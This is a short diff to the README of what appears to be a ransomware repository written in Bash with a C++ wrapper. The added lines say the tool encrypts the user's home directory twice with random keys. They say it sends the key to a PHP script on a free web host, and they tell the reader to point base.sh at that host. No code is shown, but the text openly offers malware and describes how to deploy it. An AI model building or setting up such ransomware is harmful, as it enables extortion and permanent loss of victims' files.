drigg3r/Ransomware-C-Bash-minimal/README.md

 # Ransomware-Cpp-Bash-minimal-
-This is just a type of ransomware which is mostly made in bash and given a outer shell in Cpp
+This variant of a ransomware is mostly made in bash and given a outer shell in Cpp, It encrypts The home dir of the user with a randomly generated and sends the key to a specified websie where a php script is set up to capture the key

+The post.php is a php which you upload on any free host and change the location accordingly in base.sh to capture the key

+The ransomware encrypts each file in the home dir twice, first with key1 and then key2.

+I will be uploading a mass decrypting script in future, and for any questions you can contact me on drigg3r@yandex.com